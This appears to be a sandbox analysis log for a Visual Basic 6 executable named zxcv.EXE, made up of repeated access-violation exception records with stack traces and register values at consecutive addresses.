__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a0 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6304 exception.address: 0x4018a0 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a1 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6305 exception.address: 0x4018a1 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a2 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6306 exception.address: 0x4018a2 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a3 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6307 exception.address: 0x4018a3 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a4 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6308 exception.address: 0x4018a4 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a5 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6309 exception.address: 0x4018a5 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a6 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6310 exception.address: 0x4018a6 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a7 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6311 exception.address: 0x4018a7 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a8 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6312 exception.address: 0x4018a8 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18a9 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6313 exception.address: 0x4018a9 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18aa exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6314 exception.address: 0x4018aa registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18ab exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6315 exception.address: 0x4018ab registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18ac exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6316 exception.address: 0x4018ac registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18ad exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6317 exception.address: 0x4018ad registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18ae exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6318 exception.address: 0x4018ae registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18af exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6319 exception.address: 0x4018af registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b0 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6320 exception.address: 0x4018b0 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b1 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6321 exception.address: 0x4018b1 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b2 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6322 exception.address: 0x4018b2 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b3 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6323 exception.address: 0x4018b3 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b4 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6324 exception.address: 0x4018b4 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b5 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6325 exception.address: 0x4018b5 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b6 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6326 exception.address: 0x4018b6 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
